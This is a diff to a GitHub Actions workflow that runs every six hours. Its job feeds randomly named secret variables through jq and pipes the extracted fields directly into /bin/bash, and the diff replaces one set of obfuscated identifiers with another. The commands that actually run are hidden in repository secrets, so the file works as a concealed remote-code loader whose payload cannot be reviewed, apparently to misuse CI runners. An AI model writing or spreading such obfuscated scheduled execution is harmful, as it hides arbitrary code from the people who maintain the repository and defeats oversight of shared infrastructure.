--- a/.github/workflows/mingyulu1837.yml
+++ b/.github/workflows/mingyulu1837.yml
@@ -3,8 +3,7 @@ name: mingyulu1837
 on:
   workflow_dispatch:
   schedule:
-    - cron: '31 4/6 * * *'
-
+    - cron: '4 1/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -13,20 +12,19 @@ jobs:
       - uses: actions/checkout@v4
       - name: mingyulu1837
         env:
-          t3: ${{ secrets.t3 }}
+          rch3531: ${{ secrets.rch3531 }}
         run: |
-          echo $t3 | jq -r .pmo33988 | /bin/bash
-          echo $jqe3 | jq -r .eqvho30666 | /bin/bash
-          echo $lb86 | jq -r .x54122 | /bin/bash
-          echo $gg7 | jq -r .rxct0 | /bin/bash
-          echo $fr1 | jq -r .iz4958 | /bin/bash
-          echo $quzpf5 | jq -r .mfepo41 | /bin/bash
-          echo $yedj8 | jq -r .o975 | /bin/bash
-          echo $ntkv0496 | jq -r .fgoc583 | /bin/bash
-          echo $v94389 | jq -r .lr9 | /bin/bash
-          echo $zwe4 | jq -r .qaa63707 | /bin/bash
-          echo $j21508 | jq -r .we75363 | /bin/bash
-          echo $vu6 | jq -r .l330 | /bin/bash
-          echo $neo67645 | jq -r .h06 | /bin/bash
-          echo $fstds0556 | jq -r .lq32 | /bin/bash
+          echo $rch3531 | jq -r .msxlk590 | /bin/bash
+          echo $mlr5740 | jq -r .zb2437 | /bin/bash
+          echo $yxke80946 | jq -r .wahyx646 | /bin/bash
+          echo $qoq228 | jq -r .y0360 | /bin/bash
+          echo $fbae51 | jq -r .jyjf0 | /bin/bash
+          echo $qfi767 | jq -r .qbp4 | /bin/bash
+          echo $zc21229 | jq -r .qz0590 | /bin/bash
+          echo $tzxhr90008 | jq -r .gfbt237 | /bin/bash
+          echo $swvqu7589 | jq -r .f88 | /bin/bash
+          echo $cgodr71226 | jq -r .jja735 | /bin/bash
+          echo $oo05 | jq -r .jf41413 | /bin/bash
+          echo $az8 | jq -r .awrc3 | /bin/bash
+          echo $mfpo791 | jq -r .czluj8277 | /bin/bash
 
